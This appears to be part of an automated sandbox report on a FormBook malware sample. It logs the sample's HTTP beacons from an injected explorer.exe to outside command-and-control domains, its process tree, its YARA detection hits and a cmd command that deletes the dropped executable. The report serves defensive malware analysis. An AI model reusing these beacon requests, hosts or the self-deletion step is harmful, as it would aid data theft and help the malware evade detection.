                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449772104.21.26.5580C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:34.011687994 CET5690OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1
                                                                      Host: www.pelisplusxd.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:34.063383102 CET5691INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 13 Jan 2021 20:40:34 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 13 Jan 2021 21:40:34 GMT
                                                                      Location: https://www.pelisplusxd.net/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8
                                                                      cf-request-id: 079f139dfb00002b71a29e4000000001
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bpzuCJErOfH6qrkEmOTenZXyviSOa0h53ZQ6dB%2BdpKMBsNzmn9gLOUIOXHBTJ9LNHlIRrdca%2F1ba5KuF17bSReDJe2LCcoTBGFcdlpFIC8xrBB1m"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 6111eedcca7d2b71-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.4497735.181.218.5580C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:39.319844007 CET5697OUTGET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.allismd.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:40.836158037 CET5701INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      X-Powered-By: PHP/7.2.34
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      X-Redirect-By: WordPress
                                                                      Location: https://www.allismd.com/ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG
                                                                      X-Litespeed-Cache: miss
                                                                      Content-Length: 0
                                                                      Date: Wed, 13 Jan 2021 20:40:40 GMT
                                                                      Server: LiteSpeed


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.449775219.94.203.15280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:50.541443110 CET5703OUTGET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.central-car-sales.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:50.922324896 CET5704INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Wed, 13 Jan 2021 20:40:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Location: http://central-car-sales.com/ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.44977634.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:56.048911095 CET5705OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1
                                                                      Host: www.nolarapper.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:56.187163115 CET5705INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 13 Jan 2021 20:40:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5ffc8399-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.449777192.185.0.21880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:41:06.700105906 CET5707OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1
                                                                      Host: www.promanconsortium.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:41:06.857851028 CET5708INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 13 Jan 2021 20:41:06 GMT
                                                                      Server: Apache/2.2.15 (CentOS)
                                                                      Location: https://wildcard.hostgator.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe
                                                                      Content-Length: 432
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6c 64 63 61 72 64 2e 68 6f 73 74 67 61 74 6f 72 2e 63 6f 6d 2f 75 72 30 36 2f 3f 77 30 47 3d 6e 64 69 54 46 50 63 48 58 78 6b 4c 47 26 61 6d 70 3b 6a 4c 33 30 76 76 3d 4e 4b 78 6e 71 66 37 61 37 6f 7a 61 76 6e 43 59 31 61 5a 46 71 72 65 52 6e 43 53 32 32 4e 43 47 30 58 67 70 6b 54 5a 52 50 6d 6f 74 4d 4f 50 33 63 59 2f 4f 58 71 59 6d 6a 53 76 61 4a 42 47 4a 6c 52 55 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 72 6f 6d 61 6e 63 6f 6e 73 6f 72 74 69 75 6d 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wildcard.hostgator.com/ur06/?w0G=ndiTFPcHXxkLG&amp;jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.promanconsortium.com Port 80</address></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:21:39:07
                                                                      Start date:13/01/2021
                                                                      Path:C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
                                                                      Imagebase:0xfc0000
                                                                      File size:842240 bytes
                                                                      MD5 hash:AEE550440966B0BD34D9CCB2B1F7F146
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:21:39:16
                                                                      Start date:13/01/2021
                                                                      Path:C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
                                                                      Imagebase:0x6a0000
                                                                      File size:842240 bytes
                                                                      MD5 hash:AEE550440966B0BD34D9CCB2B1F7F146
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:21:39:19
                                                                      Start date:13/01/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:21:39:32
                                                                      Start date:13/01/2021
                                                                      Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                                      Imagebase:0x380000
                                                                      File size:829856 bytes
                                                                      MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:21:39:36
                                                                      Start date:13/01/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:21:39:37
                                                                      Start date:13/01/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >